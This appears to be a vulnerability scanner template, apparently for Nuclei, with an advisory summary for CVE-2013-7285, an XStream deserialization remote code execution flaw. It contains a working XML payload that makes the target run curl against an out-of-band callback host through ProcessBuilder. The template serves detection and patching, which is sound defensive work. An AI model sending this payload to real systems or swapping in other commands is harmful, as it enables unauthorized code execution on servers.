Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
PoC代码[已公开]
id: CVE-2013-7285
info:
name: XStream <1.4.6/1.4.10 - Remote Code Execution
author: pwnhxl,vicrack
severity: critical
description: |
Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: |
Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability.
reference:
- https://x-stream.github.io/CVE-2013-7285.html
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html
- https://nvd.nist.gov/vuln/detail/cve-2013-7285
- https://blog.csdn.net/Xxy605/article/details/126297121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2013-7285
cwe-id: CWE-78
epss-score: 0.15054
epss-percentile: 0.94339
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xstream_project
product: xstream
tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<sorted-set>
<string>foo</string>
<contact class='dynamic-proxy'>
<interface>java.lang.Comparable</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>curl</string>
<string>http://{{interactsh-url}}</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
</sorted-set>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4b0a00483046022100abc3d9c9e6ed6830ad14bc2c20c81ef523c2bae498d6504f9bbcca55605c66e8022100a0fea80143260d51e1eef4bd9a87d3f7e9998b86fa8ea4dada63a2311de96366:922c64590222798bb761d5b6d8e72950